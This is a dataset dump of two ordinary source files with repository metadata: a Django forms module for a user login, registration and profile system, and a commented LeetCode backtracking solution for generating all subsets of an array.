e10826db48bc30e47dd014c15a1662c7c79db3f1 | 27696870511ac02b75e4389fa4b54afa0f3978d0 | /mysite/apps/users/forms.py | ed7cf48fadccff4eab2da9a21a8251c423c7a5d2 | [] | no_license | tminlun/OnlineEducation | ef4f7f6a3742b10dcaf4d263a9366fa1446d73fe | 5008aeaa14a15b799d37fadd44c1c17b9ade7a68 | refs/heads/master | 2020-04-09T19:01:22.747193 | 2019-02-05T03:15:56 | 2019-02-05T03:15:56 | 160,531,635 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | from captcha.fields import CaptchaField
from django import forms
from .models import UserProfile
class LoginForm(forms.Form):
"""登录验证表单"""
username = forms.CharField(required=True)
password = forms.CharField(required=True, min_length=6)
class RegisterForm(forms.Form):
"""注册验证表单"""
username = forms.CharField(required=True, min_length=2,max_length=10)
email = forms.EmailField(required=True)
password = forms.CharField(required=True, min_length=6,max_length=20)
password_again = forms.CharField(required=True, min_length=6, max_length=20)
captcha = CaptchaField(error_messages={"invalid": "验证码输入错误"})#验证码,可以自定义错误。key(invalid是固定的),value自己可以随意写
class ForgetPwdForm(forms.Form):
"""找回密码表单"""
email = forms.EmailField(required=True)
captcha = CaptchaField(error_messages={"invalid": "验证码输入错误"})
class ModifyPwdForm(forms.Form):
"""找回密码表单"""
password1 = forms.CharField(required=True, min_length=6, max_length=15)
password2 = forms.CharField(required=True, min_length=6, max_length=15)
class ModifyImageForm(forms.ModelForm):
"""修改头像"""
class Meta:
model = UserProfile
fields = ['image']
class UpdatePwdForm(forms.Form):
password1 = forms.CharField(required=True, min_length=6, max_length=15)
password2 = forms.CharField(required=True, min_length=6, max_length=15)
class UpdateUserForm(forms.ModelForm):
"""修改个人信息"""
class Meta:
model = UserProfile
fields = ['nick_name', 'brithday', 'gander', 'adress', 'mobile']
| [
"[email protected]"
] | |
6871dbe97578fe8557bb9d770b9e99836a77fab7 | ebf7427c8605d8654c67e3386b8adb2bd7503b44 | /LeetCode Pattern/3. Backtracking/78_med_subsets.py | 531b1f975ffeb5fe748d8104138d4181755a7f74 | [] | no_license | ryoman81/Leetcode-challenge | 78e5bc4800a440052f8515c75829e669484fed40 | fac3a49c49d2f62eafffb201a9d9cfac988ad30a | refs/heads/master | 2023-09-04T05:21:54.569459 | 2021-10-26T14:14:08 | 2021-10-26T14:14:08 | 291,615,959 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,345 | py | '''
Given an integer array nums of unique elements, return all possible subsets (the power set).
The solution set must not contain duplicate subsets. Return the solution in any order.
Example 1:
Input: nums = [1,2,3]
Output: [[],[1],[2],[1,2],[3],[1,3],[2,3],[1,2,3]]
Example 2:
Input: nums = [0]
Output: [[],[0]]
Constraints:
1 <= nums.length <= 10
-10 <= nums[i] <= 10
All the numbers of nums are unique.
'''
class Solution:
'''
MY CODE VERSION
Thought:
Template:
- Almost the same as question to 77. combination
- We need to update result ANYTIME when we enter this recursion
Complexity:
Time: O(n * 2^n) - comparing to 46 and 77, this time complexity is more of a mathematical question. I copied it from official solution.
Space: O(n)
'''
def subsets(self, nums):
result = []
path = []
def backtracking (start):
# the subset requires anytime when recursion, it is one of the result
result.append(path[:])
# base case
if start == len(nums):
return
# search solution space
for i in range(start, len(nums)):
path.append(nums[i])
backtracking(i+1)
path.pop()
backtracking(0)
return result
## Run code after defining input and solver
input1 = [1,2,3]
solver = Solution().subsets
print(solver(input1)) | [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.